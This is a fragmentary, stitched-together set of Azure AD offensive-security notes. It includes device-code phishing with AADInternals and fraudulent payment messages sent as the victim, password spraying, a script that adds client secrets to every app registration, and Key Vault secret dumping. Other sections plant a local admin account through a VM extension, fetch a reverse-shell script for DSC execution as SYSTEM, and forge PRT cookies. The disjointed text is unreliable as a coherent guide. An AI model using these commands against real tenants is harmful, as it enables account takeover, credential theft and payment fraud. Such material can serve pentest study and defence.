Note! If the user is not logged in, the user needs to log in using whatever
methods the target organisation is using.
After successfull authentication, the following is shown to the user.\
:warning: At this point the identity of the user is compromised!
:warning:
https://login.microsoftonline.com/Common/oauth2/token?api-
version=1.0
The request must include the following parameters (code is the device_code
from the step 1)
Parameter
client_id d3590ed6-52b3-4102-aeff-aad2292ab01c
resource https://graph.windows.net
CAQABAAEAAAB2UyzwtQEKR7-
code rWbgdcBZIGm0IlLxBn23EWIrgw7fkNIKyMdS2xoEg9QA
vqATogllBjA-t_ZM2B0cgcjQgAA
grant_type urn:ietf:params:oauth:grant-type:device_code
After successfull login, we’ll get the following response (tokens truncated):
{
"token_type": "Bearer",
"scope": "user_impersonation",
"expires_in": "7199",
"ext_expires_in": "7199",
"expires_on": "1602662787",
"not_before": "1602655287",
"resource": "https://graph.windows.net",
"access_token": "eyJ0eXAi...HQOT1rvUEOEHLeQ",
"refresh_token": "0.AAAAxkwD...WxPoK0Iq6W",
"foci": "1",
"id_token": "eyJ0eXAi...widmVyIjoiMS4wIn0."
}
The following script connects to the Azure AD token endpoint and polls for
authentication status.
$continue = $true
$interval = $authResponse.interval
$expires = $authResponse.expires_in
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "urn:ietf:params:oauth:grant-
type:device_code"
"code" = $authResponse.device_code
"resource" = "https://graph.windows.net"
}
while($continue)
{
Start-Sleep -Seconds $interval
$total += $interval
try
{
$response = Invoke-RestMethod -UseBasicParsing -Method
Post -Uri
"https://login.microsoftonline.com/Common/oauth2/token?api-
version=1.0 " -Body $body -ErrorAction SilentlyContinue
}
catch
{
# This is normal flow, always returns 40x unless
successful
$details=$_.ErrorDetails.Message | ConvertFrom-Json
$continue = $details.error -eq "authorization_pending"
Write-Host $details.error
if(!$continue)
{
# Not pending so this is a real error
Write-Error $details.error_description
return
}
}
if($response)
{
break # Exit the loop
}
}
We can also get access tokens to other services using the refresh token as
long as the client_id remains the same.
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "refresh_token"
"scope" = "openid"
"resource" = "https://outlook.office365.com"
"refresh_token" = $response.refresh_token
}
Send-AADIntOutlookMessage -AccessToken
$EXOresponse.access_token -Recipient
"[email protected]" -Subject "Overdue payment" -Message
"Pay this <h2>asap!</h2>"
Using AADInternals for phishing
AADInternals (v0.4.4 or later) has an Invoke-AADIntPhishing function
which automates the phishing process.
Email
The following example sends a phishing email using a customised message.
The tokens are saved to the cache.
Invoke-AADPhishing -Recipients
"[email protected]","[email protected]" -Subject "Johnny
shared a document with you" -Sender "Johnny Carson
<[email protected]>" -SMTPServer smtp.myserver.local -Message
$message -SaveToCache
Code: CKDZ2BURF
Mail sent to: [email protected]
...
Received access token for [email protected]
And now we can send email as the victim using the cached token.
Send-AADIntOutlookMessage -Recipient
"[email protected]" -Subject "Overdue payment" -Message
"Pay this <h2>asap!</h2>"
We can also send a Teams message to make the payment request more
urgent:
Sent MessageID
---- ---------
16/10/2020 14.40.23 132473328207053858
The following video shows how to use AADInternals for email phishing.
Teams
AADInternals supports sending phishing messages as Teams chat messages.
Note! After the victim has “authenticated�? and the tokens are received,
AADInternals will replace the original message. This message can be
provided with -CleanMessage parameter.
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache
Code: CKDZ2BURF
Teams message sent to: [email protected]. Message id:
132473151989090816
...
Received access token for [email protected]
However, the access tokens acquired using the refresh token do not appear
in signing log!
:warning: If there are indications that the user is signing in from non-typical
locations, the user account might be compromised.
Preventing
The only effective way for preventing phishing using this technique is to
use Conditional Access (CA) policies. To be specific, the phishing can not
be prevented, but we can prevent users from signing in based on certain
rules. Especially the location and device state based policies are effective
for protecting accounts. This applies for the all phishing techniques
currently used.
However, it is not possible to cover all scenarios. For instance, forcing MFA
for logins from illicit locations does not help if the user is logging in using
MFA.
Mitigating
If the user has been compromised, the user’s refresh tokens can be revoked,
which prevents attacker getting new access tokens with the compromised
refresh token.
Summary
As far as I know, the device code authentication flow technique has not
used for phishing before.
From the attacker point of view, this method has a couple of pros:
From the attacker point of view, this method has at least one con:
Of course, the attacker can minimise the time restriction by sending the
phishing email to multiple recipients - this will increase the probability that
someone signs in using the code.
Another way is to implement a proxy which would start the authentication
when the link is clicked (credits to @MrUn1k0d3r). However, this way the
advantage of using a legit microsoft.com url would be lost.
However, note that this technique is very noisy and Blue Team can easily
catch it. Moreover, forced password complexity and the use of MFA can
make this technique kind of useless.
. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password
Welcome2022! -Verbose
Or with o365spray
Or with MailSniper
#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList
.\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-
sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList
.\userlist.txt -Password Spring2021 -Threads 15 -OutFile
sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password
Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Raw requests
secret:$IDENTITY_HEADER'); .
Then query the Azure REST API to get the subscription ID and more .
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-
version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
1. After the user has accessed the application through an endpoint, the
user is directed to the Azure AD sign-in page.
2. After a successful sign-in, Azure AD sends a token to the user's client
device.
3. The client sends the token to the Application Proxy service, which
retrieves the user principal name (UPN) and security principal name
(SPN) from the token. Application Proxy then sends the request to
the Application Proxy connector.
4. If you have configured single sign-on, the connector performs any
additional authentication required on behalf of the user.
5. The connector sends the request to the on-premises application.
6. The response is sent through the connector and Application Proxy
service to the user.
Enumeration
# Enumerate applications with application proxy configured
Get-AzureADApplication | %{try{Get-
AzureADApplicationProxyApplication -ObjectId
$_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
History
If you can access it, you can have info about resources that are not present
but might be deployed in the future. Moreover, if a parameter containing
sensitive info was marked as "String" instead of "SecureString", it will be
present in clear-text.
Search Sensitive Info
Users with the permissions Microsoft.Resources/deployments/read and
Microsoft.Resources/subscriptions/resourceGroups/read can read the
deployment history.
Get-AzResourceGroup
Get-AzResourceGroupDeployment -ResourceGroupName <name>
# Export
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName
<RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
cat <DEPLOYMENT NAME>.json # search for hardcoded password
cat <PATH TO .json FILE> | Select-String password
References
https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/~/changes/arg
Ksv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-
services/az-arm-templates#references
These are like "scheduled tasks" in Azure that will let you execute things
(actions or even scripts) to manage, check and configure the Azure
environment.
Run As Account
When Run as Account is used, it creates an Azure AD application with
self-signed certificate, creates a service principal and assigns the
Contributor role for the account in the current subscription (a lot of
privileges).\ Microsoft recommends using a Managed Identity for
Automation Account.
This will be removed on September 30, 2023 and changed for Managed
Identities.
Compromise Runbooks & Jobs
Runbooks allows you to execute arbitrary PowerShell code. This could
be abused by an attacker to steal the permissions of the attached principal
(if any).\ In the code of Runbooks you could also find sensitive info (such
as creds).
If you can read the jobs, do it as they contain the output of the run
(potential sensitive info).
Hybrid Worker
A Runbook can be run in a container inside Azure or in a Hybrid
Worker.\ The Log Analytics Agent is deployed on the VM to register it as
a hybrid worker.\ The hybrid worker jobs run as SYSTEM on Windows and
nxautomation account on Linux.\ Each Hybrid Worker is registered in a
Hybrid Worker Group.
RCE
It's possible to abuse SC to run arbitrary scripts in the managed machines.
az-state-configuration-rce.md
Enumeration
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the
user is not a part of an Automation group
Create a Runbook
# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope
/subscriptions/<ID>/resourceGroups/<RG-
NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMA
TION-ACCOUNT>
These files will serve as a template. You’ll need to fill in the variable
names and parameters with what you’re using. This includes the
resource names, file paths, and the external server/payload names that
you’re using. Please refer to the comments in the code.
wget
https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/maste
r/RevPS.ps1
We need to edit the reverse-shell script by adding our parameters in, so the
Windows VM knows where to connect to once it’s executed. In my case I
add following:
We see that the scheduled task has run and our payload was retrieved and
executed in memory with SYSTEM level privileges!
Wrapping Up
This now opens the door for many possibilities. Since we have a shell
running as SYSTEM, we can dump credentials with mimikatz (potentially
risky depending on how mature the EDR is for cloud resources). If you
dump creds , there's a good chance that these can be reused elsewhere
across different resources. Lastly, a big takeaway is that instead of limiting
this to one VM, you now have the ability to potentially apply this
configuration across multiple VM’s.
On that note, this concludes our Azure Automation DSC adventures! I hope
you had fun, learned a lot and continue to expand with your own creativity.
Enumeration
For this enumeration you can use the az cli tool, the PowerShell module
AzureAD (or AzureAD Preview) and the Az PowerShell module.
Connection
az cli
az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity
az login --identity -u
/subscriptions/<subscriptionId>/resourcegroups/myRG/providers/M
icrosoft.ManagedIdentity/userAssignedIdentities/myID #Login
with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-
31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With
password
az login --service-principal -u http://azure-cli-2016-08-05-14-
31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com
#With cert
# Help
az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples
Azure AD
Connect-AzureAD #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzureAD -Credential $creds
# Using tokens
## AzureAD cannot request tokens, but can use AADGraph and
MSGraph tokens to connect
Connect-AzureAD -AccountId [email protected] -
AadAccessToken $token
Az PowerShell
Connect-AzAccount #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzAccount -Credential $creds
Raw PS
$Token = 'eyJ0eXAi..'
# List subscriptions
$URI = 'https://management.azure.com/subscriptions?api-
version=2020-01-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
# Vault
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-
version=2017-09-01" -H secret:$IDENTITY_HEADER
Users
az cli
# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "[email protected]"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?
contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].
{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?
osi==null]"
az ad user list --query "[?
onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].
{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?
osi!=null]"
az ad user list --query "[?
onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-
administrators true --assignee <email>
Azure AD
# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId [email protected] | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the
begining of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"}
#Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId [email protected]|%
{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties =
$_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_
-match 'password') {"$($Properties.UserPrincipalName) - $_ -
$($Properties.$_)"}}}
# All users from AzureAD# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier
-eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier
-ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-
AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId [email protected]
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId [email protected]
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId '[email protected]'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId [email protected]
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId
[email protected]
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId [email protected] |
Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq
'[email protected]'"
Get-AzureADMSAdministrativeUnit | where { Get-
AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq
$userObj.ObjectId } }
Az PowerShell
# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName [email protected]
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginnig of
DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName [email protected]
Groups
az cli
# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?
contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].
{osi:onPremisesSecurityIdentifier,displayName:displayName,descr
iption:description}[?osi==null]"
az ad group list --query "[?
onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].
{osi:onPremisesSecurityIdentifier,displayName:displayName,descr
iption:description}[?osi!=null]"
az ad group list --query "[?
onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "
[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-
AzureADGroupAppRoleAssignment | fl *
Azure AD
# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzADGroup -DisplayName <resource_group_name> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by
"admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"}
#Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier
-eq $null}
# All groups that are synced from on-prem (note that security
groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier
-ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString
"Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-
b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq
'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-
AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq
$groupObj.ObjectId} }
Az PowerShell
# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the
beginnig of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <resource_group_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>
{ % code overflow="wrap" %}
Service Principals
Note that Service Principal in PowerShell terminology is called
Enterprise Applications in the Azure portal (web).
az cli
# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?
contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o
table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials !=
null].displayName"
# List apps that have key credentials (use of certificate
authentication)
az ad sp list -all --query "[?keyCredentials !=
null].displayName"
Azure AD
# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -
match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match
"103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-
AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalMembership |fl *
Az PowerShell
# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>
Raw
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
.PARAMETER GraphToken
Pass the Graph API Token
.EXAMPLE
PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
.LINK
https://docs.microsoft.com/en-us/graph/api/application-
list?view=graph-rest-1.0&tabs=http
https://docs.microsoft.com/en-us/graph/api/application-
addpassword?view=graph-rest-1.0&tabs=http
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[String]
$GraphToken = $null
)
$AppList = $null
$AppPassword = $null
$Params = @{
"URI" =
"https://graph.microsoft.com/v1.0/applications"
"Method" = "GET"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
try
{
$AppList = Invoke-RestMethod @Params -UseBasicParsing
}
catch
{
}
foreach($App in $AppList.value)
{
$ID = $App.ID
$psobj = New-Object PSObject
$Params = @{
"URI" =
"https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
"Method" = "POST"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
$Body = @{
"passwordCredential"= @{
"displayName" = "Password"
}
}
try
{
$AppPassword = Invoke-RestMethod @Params -
UseBasicParsing -Body ($Body | ConvertTo-Json)
Add-Member -InputObject $psobj -
NotePropertyName "Object ID" -NotePropertyValue $ID
Add-Member -InputObject $psobj -
NotePropertyName "App ID" -NotePropertyValue $App.appId
Add-Member -InputObject $psobj -
NotePropertyName "App Name" -NotePropertyValue $App.displayName
Add-Member -InputObject $psobj -
NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
Add-Member -InputObject $psobj -
NotePropertyName "Secret" -NotePropertyValue
$AppPassword.secretText
$Details.Add($psobj) | Out-Null
}
catch
{
Write-Output "Failed to add new client secret
to '$($App.displayName)' Application."
}
}
if($Details -ne $null)
{
Write-Output ""
Write-Output "Client secret added to : "
Write-Output $Details | fl *
}
}
else
{
Write-Output "Failed to Enumerate the Applications."
}
}
Roles
az cli
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].
{principalName:principalName,principalType:principalType,resour
ceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?
roleDefinitionName=='<ROLE_NAME>']"
Azure AD
# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the
role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |
select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global
Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over
the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *
Az PowerShell
Raw
# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-
108d-4049-8c11-
d52d5d388768/resourceGroups/Research/providers/Microsoft.Comput
e/virtualMachines/infradminsrv/providers/Microsoft.Authorizatio
n/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
Devices
az cli
Azure AD
# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?
{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-
AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID)
{$_;$user.UserPrincipalName;"`n"}}
# Registred users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-
AzureADDeviceRegisteredUser -ObjectId $_.ObjectID)
{$_;$user.UserPrincipalName;"`n"}}
# Get dives managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId [email protected]
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-
AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where
{$_.ObjectId -eq $deviceObjId} }
Apps
Apps are App Registrations in the portal (not Enterprise Applications).\
But each App Registration will create an Enterprise Application (Service
Principal) with the same name.\ Moreover, if the App is a multi-tenant
App, another Enterprise App (Service Principal) will be created in that
tenant with the same name.
az cli
# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?
contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o
table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials !=
null].displayName"
# List apps that have key credentials (use of certificate
authentication)
az ad app list --query "[?keyCredentials != null].displayName"
Azure AD
# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id> | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-
AzureADApplicationPasswordCredential -ObjectID $_.ObjectID)
{$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-
AzureADApplicationOwner |fl *
Az PowerShell
# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential
A secret string that the application uses to prove its identity when
requesting a token is the application password.\ So, if find this password
you can access as the service principal inside the tenant.\ Note that this
password is only visible when generated (you could change it but you
cannot get it again).\ The owner of the application can add a password to
it (so he could impersonate it).\ Logins as these service principals are not
marked as risky and they won't have MFA.
Administrative Units
It's used for better management of users.
Therefore, you can assign roles to the administrator unit and members of it
will have this roles.
az cli
```
AzureAD
```powershell
# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter
"displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the
administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID
and role members
References
https://learn.microsoft.com/en-us/azure/active-
directory/roles/administrative-units
Each app runs inside a sandbox but isolation depends upon App Service
plans
Enumeration
Enumeration
Public Exposure
If "Allow Blob public access" is enabled (disabled by default), it's possible
to:
Give public access to read blobs (you need to know the name).
List container blobs and read them.
Connect to Storage
If you find any storage you can connect to you could use the tool
Microsoft Azure Storage Explorer to do so.
SAS URLs
A shared access signature (SAS) provides secure delegated access to
resources in your storage account. With a SAS, you have granular control
over how a client can access your data. For example:
A user delegation SAS is supported for Azure Blob Storage and Azure
Data Lake Storage Gen2. Stored access policies are not supported for a
user delegation SAS.
To use Azure Active Directory (Azure AD) credentials to secure a SAS for
a container or blob, user a user delegation SAS.
Account SAS
An account SAS is secured with one of the storage account keys (there are
2). An account SAS delegates access to resources in one or more of the
storage services. All of the operations available via a service or user
delegation SAS are also available via an account SAS.
type}/{object-name}/{object-version} Where:
In order to access to the secrets stored in the vault 2 permissions models can
be used:
Access Management
Access to a vault is controlled though two planes :
# List vaults
Get-AzKeyVault
# Get secrets names from the vault
Get-AzKeyVaultSecret -VaultName <vault_name>
# Get secret values
Get-AzKeyVaultSecret -VaultName <vault_name> -Name
<secret_name> –AsPlainText
Therefore, if you have access to write it, you can execute arbitrary code:
# Microsoft.Compute/virtualMachines/extensions/write
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName
"ExecCmd" -VMName "infradminsrv" -Location "Germany West
Central" -Publisher Microsoft.Compute -ExtensionType
CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString
'{"commandToExecute":"powershell net users new_user
Welcome2022. /add /Y; net localgroup administrators new_user
/add"}'
DesiredConfigurationState
DesiredConfigurationState (DSC) is similar to Ansible, but is a tool
within PowerShell that allows a host to be setup through code. DSC has its
own extension in Azure which allows the upload of configuration files.
DSC configuration files are quiet picky when it comes to syntax, however
the DSC extension is very gullible and will blindly execute any command
anything as long as it follows a certain format, as shown in figure 5.
This can be done via the Az PowerShell function Publish-
VM Application Definitions
The VM Applications resource is a way to deploy versioned applications
repeatably to an Azure VM. For example, if you create a program and
deploy it to all Azure VMs as version 1.0, once you update the program to
1.1, you can use the same VM Application to create another definition
and push the update out to any VM. Being able to push out an application
to a VM means it’s another avenue for code execution. This method’s
drawback is that setting up the Application Definition requires a few steps,
but can be accomplished using the New-AzGalleryApplication and New-
Since it’s an extension that ultimately does the execution, a copy of the
application is located at
C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindo
ws\1.0.4\Status\ .
Azure AD joined
Workplace joined
https://pbs.twimg.com/media/EQZv7UHXsAArdhn?
format=jpg&name=large
Hybrid joined
https://pbs.twimg.com/media/EQZv77jXkAAC4LK?
format=jpg&name=large
Azure AD Connect
Another way to pivot from could to On-Prem is abusing Intune
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-
forensic-methodology/specific-software-file-type-tricks/browser-artifacts?
q=browse#google-chrome
Attack
The challenging part is that those cookies are encrypted for the user via
the Microsoft Data Protection API (DPAPI). This is encrypted using
cryptographic keys tied to the user the cookies belong to. You can find more
information about this in:
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-
escalation/dpapi-extracting-passwords
Then, when the browser tries to access resources on the cloud, a PRT
cookie is used to access them.
For more information about how this works read the documentation or this
page.
Dsregcmd.exe /status
In the SSO State section, you should see the AzureAdPrt set to YES.
In the same output you can also see if the device is joined to Azure (in the
field AzureAdJoined ):
Pass-the-PRT
Steps
1. Extract the PRT from LSASS and save this for later.
2. Extract the Session Key. If you remember this is issued and then re-
encrypted by the local device, so we need to decrypt this using a
DPAPI masterkey. For more info about DPAPI check this
HackTricks link or the Pass-the-cookie attack.
3. Using the decrypted Session Key, we will obtain the derived key for
the PRT and the context. This is needed to create our PRT cookie.
The derived key is what is used to sign the JWT for the cookie. Dirk-
jan did a great job explaining this process here.
Now we have everything we need to sign our own PRT Cookies and the rest
of these steps can be done from any other system.
We will use the PRT, derived key, and context to create a new PRT
Cookie.
Import the cookie into your browser session (we’ll use Chrome)
That’s it! You should now be authenticated as that user without having
to know their password, or handle any MFA prompts.
Attack - Roadtoken
For more info about this way check this post. To generate a valid PRT
cookie the first thing you need is a nonce. You can get this with:
$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL =
"https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body
$Body
$Result.Nonce
